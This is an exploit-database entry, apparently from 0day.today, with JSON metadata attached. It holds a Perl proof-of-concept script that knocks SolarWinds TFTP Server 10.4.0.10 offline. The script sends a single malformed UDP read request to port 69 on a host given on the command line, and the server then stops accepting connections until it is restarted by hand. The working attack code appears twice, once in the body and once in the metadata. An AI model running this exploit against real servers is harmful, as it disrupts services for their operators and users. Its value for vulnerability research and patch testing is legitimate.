ID 1337DAY-ID-12333 Type zdt Reporter Nullthreat Modified 2010-05-21T00:00:00
Description
Exploit for windows platform in category dos / poc
=============================
Solarwinds 10.4.0.10 TFTP DoS
=============================
# Exploit Title: Solarwinds TFTP DOS
# Date: 5-21-2010
# Author: Nullthreat
# Software Link: http://www.solarwinds.com/products/freetools/free_tftp_server.aspx
# Version: 10.4.0.10
# Tested on: Windows XP SP3
# Code :
#!/usr/bin/perl
# SolarWinds TFTP Server 10.4.0.10 Remote DoS Exploit
# by Nullthreat
# The application will not crash, but it will stop accepting connections.
# You will be forced to restart the server by hand in the config
# Thanks to: LoneFerret, CoreLanC0der, PureHate, Rel1k
use IO::Socket;
$port = "69";
$host = $ARGV[0];
$s = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');
$really=
"\x00\x01". # Opcode 1 = Read Request
"\x01". # The crash....no really thats it
"\x00". # Null byte
"NETASCII". # The mode
"\x00"; # Null byte
$s->send($really);
# 0day.today [2018-04-06] #
{"id": "1337DAY-ID-12333", "lastseen": "2018-04-06T03:38:50", "viewCount": 3, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.7, "vector": "NONE", "modified": "2018-04-06T03:38:50", "rev": 2}, "dependencies": {"references": [], "modified": "2018-04-06T03:38:50", "rev": 2}, "vulnersScore": -0.7}, "type": "zdt", "sourceHref": "https://0day.today/exploit/12333", "description": "Exploit for windows platform in category dos / poc", "title": "Solarwinds 10.4.0.10 TFTP DoS", "cvelist": [], "sourceData": "=============================\r\nSolarwinds 10.4.0.10 TFTP DoS\r\n=============================\r\n\r\n\r\n# Exploit Title: Solarwinds TFTP DOS\r\n# Date: 5-21-2010\r\n# Author: Nullthreat\r\n# Software Link: http://www.solarwinds.com/products/freetools/free_tftp_server.aspx\r\n# Version: 10.4.0.10\r\n# Tested on: Windows XP SP3\r\n# Code :\r\n \r\n#!/usr/bin/perl\r\n# SolarWinds TFTP Server 10.4.0.10 Remote DoS Exploit\r\n# by Nullthreat\r\n# The application will not crash, but it will stop accepting connections.\r\n# You will be forced to restart the server by hand in the config\r\n# Thanks to: LoneFerret, CoreLanC0der, PureHate, Rel1k\r\n \r\nuse IO::Socket;\r\n$port = \"69\";\r\n$host = $ARGV[0];\r\n$s = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');\r\n \r\n$really=\r\n\"\\x00\\x01\". # Opcode 1 = Read Request\r\n\"\\x01\". # The crash....no really thats it\r\n\"\\x00\". # Null byte\r\n\"NETASCII\". # The mode\r\n\"\\x00\"; # Null byte\r\n$s->send($really);\r\n\r\n\r\n\r\n\r\n\n\n# 0day.today [2018-04-06] #", "published": "2010-05-21T00:00:00", "references": [], "reporter": "Nullthreat", "modified": "2010-05-21T00:00:00", "href": "https://0day.today/exploit/description/12333"}